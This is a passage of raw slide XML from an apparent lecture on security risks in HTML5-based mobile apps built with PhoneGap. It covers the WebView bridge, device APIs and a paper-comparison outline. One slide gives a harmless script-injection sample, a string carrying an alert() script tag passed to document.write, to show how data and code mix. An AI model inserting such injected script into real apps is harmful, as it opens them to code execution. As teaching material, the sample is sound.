              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="045C75"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="image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0804" y="1291769"/>
            <a:ext cx="6352736" cy="4207332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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456796" y="379994"/>
            <a:ext cx="8229601" cy="85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>
              <a:defRPr sz="38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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overview of HTML5-based Mobile App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858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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Shape 1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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Shape 194"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="4622002"/>
            <a:ext cx="762000" cy="139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900">
                <a:solidFill>
                  <a:srgbClr val="045C75"/>
                </a:solidFill>
              </a:rPr>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="045C75"/>
              </a:solidFill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456796" y="379994"/>
            <a:ext cx="8229601" cy="85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>
              <a:defRPr sz="38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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overview of HTML5-based Mobile App</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="196" name="image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0225" y="1351486"/>
            <a:ext cx="6633824" cy="36921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456796" y="379994"/>
            <a:ext cx="8229601" cy="857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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overview of HTML5-based Mobile App</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="201" name="Group 201"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="888763" y="1559592"/>
            <a:ext cx="2012110" cy="2976611"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="2012109" cy="2976609"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="199" name="Shape 199"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-2"/>
              <a:ext cx="2012110" cy="2976611"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="145191"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round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 lvl="0"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-1" y="2692153"/>
              <a:ext cx="2012110" cy="2844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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="b">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr>
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400"/>
                <a:t>PhoneGap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="204" name="Group 204"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3865390" y="1909123"/>
            <a:ext cx="1371606" cy="2291052"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1371605" cy="2291050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="202" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1371606" cy="2286004"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="14519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0" y="0"/>
              <a:ext cx="1371606" cy="22910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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>Device</a:t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>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>Accelerometer</a:t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>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>Camera</a:t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>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>Compass</a:t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>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>Contacts</a:t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>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>File</a:t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>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>Geolocation</a:t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>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>Notification</a:t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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:rPr>
                <a:t>…</a:t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207" name="Group 207"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1145938" y="1716762"/>
            <a:ext cx="1533613" cy="2478307"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="1533611" cy="2478305"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="205" name="Shape 205"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="0"/>
              <a:ext cx="1533613" cy="2478306"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="145191"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="b">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0"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-2" y="2193850"/>
              <a:ext cx="1533613" cy="2844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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="b">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr>
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400"/>
                <a:t>WebView</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="210" name="Group 210"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1407934" y="1831056"/>
            <a:ext cx="1050313" cy="2095510"/>
            <a:chOff x="-1" y="-1"/>
            <a:chExt cx="1050312" cy="2095509"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208" name="Shape 208"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="-2"/>
              <a:ext cx="1050314" cy="2095511"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F6FC6"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="14519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-2" y="689625"/>
              <a:ext cx="1050314" cy="7162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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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HTML</a:t>
              </a:r>
              <a:endParaRPr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 algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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CSS</a:t>
              </a:r>
              <a:endParaRPr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 algn="ctr">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FFFF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JavaScript</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Shape 211"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2458158" y="1909127"/>
            <a:ext cx="360605" cy="1897199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25400">
            <a:solidFill>
              <a:srgbClr val="145191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2" name="Shape 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1650233" y="2607549"/>
            <a:ext cx="1862100" cy="500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 anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addJavascriptInterface()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="215" name="Group 215"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5674408" y="1466490"/>
            <a:ext cx="2627409" cy="1186153"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="2627407" cy="1186152"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="213" name="Shape 213"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-2"/>
              <a:ext cx="2627408" cy="1177212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat">
              <a:solidFill>
                <a:srgbClr val="54A83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-1" y="1"/>
              <a:ext cx="2627408" cy="11861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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr b="1">
                  <a:solidFill>
                    <a:srgbClr val="0B9B74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Advantage: </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr b="1">
                  <a:solidFill>
                    <a:srgbClr val="0B9B74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Can be easily ported between different platforms</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="218" name="Group 218"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5622696" y="2943355"/>
            <a:ext cx="2627409" cy="1465551"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="2627407" cy="1465549"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="216" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="0"/>
              <a:ext cx="2627408" cy="1454110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:pr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-1" y="-2"/>
              <a:ext cx="2627408" cy="1465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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF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Disadvantage: </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF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Need to build the bridge between JavaScript and native resources</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Shape 219"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2936756" y="2943362"/>
            <a:ext cx="928501" cy="22080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F6FC6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="145191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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="220" name="image1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53532" y="2758482"/>
            <a:ext cx="590404" cy="590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1"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13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fill="hold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1" animBg="1" advAuto="0"/>
      <p:bldP spid="211" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="220" grpId="3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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="528637"/>
            <a:ext cx="8229600" cy="8574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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overview of PhoneGap Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="223" name="image1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4919" y="1465203"/>
            <a:ext cx="6778915" cy="34600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xfrm>
            <a:off x="457200" y="-30163"/>
            <a:ext cx="8229600" cy="56807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457200">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="2E679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2E6795"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: raising a native alert from JS code </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="226" name="image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2764" y="569266"/>
            <a:ext cx="6169003" cy="45209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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="287336"/>
            <a:ext cx="8229600" cy="56808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457200">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="2E679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2E6795"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: accessing the camera </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="229" name="image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20616"/>
            <a:ext cx="9144000" cy="30303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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Shape 232"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="983298"/>
            <a:ext cx="8229600" cy="372570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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Background and motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1"/>
              <a:t>Overall problem definition and challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Related work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Comparison between the two papers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Conclusions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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193427" y="528637"/>
            <a:ext cx="8950508" cy="8574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822958">
              <a:defRPr sz="34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04617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Risks in HTML5-based Mobile App (JavaScript)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Shape 235"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1451373"/>
            <a:ext cx="8229600" cy="3292200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="34275" tIns="34275" rIns="34275" bIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="449914" lvl="0" indent="-456264">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Data and code can be mixed together.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>var text="Hello!&lt;script&gt;alert('hello')&lt;/script&gt;";</a:t>
            </a:r>
            <a:endParaRPr i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>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>      document.write(text);</a:t>
            </a:r>
            <a:endParaRPr i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>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr i="1">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="449914" lvl="0" indent="-456264">
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Once it runs, the data will be displayed, and the JavaScript code will also be executed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Shape 236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533767" y="1899136"/>
            <a:ext cx="483604" cy="228605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="145191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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Shape 237"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2031024" y="1899136"/>
            <a:ext cx="2330105" cy="228605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000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pPr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650562" y="2175622"/>
            <a:ext cx="1265943" cy="272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FF0000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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Outline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xfrm>
            <a:off x="457200" y="983298"/>
            <a:ext cx="8229600" cy="372570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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Background and motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Overall problem definition and challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Related work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Comparison between the two papers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Conclusions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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657648" y="18834"/>
            <a:ext cx="3447903" cy="386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 algn="ctr" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2100" b="1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>
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>Attack Procedures </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Shape 241"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1595085" y="182879"/>
            <a:ext cx="1527790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defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
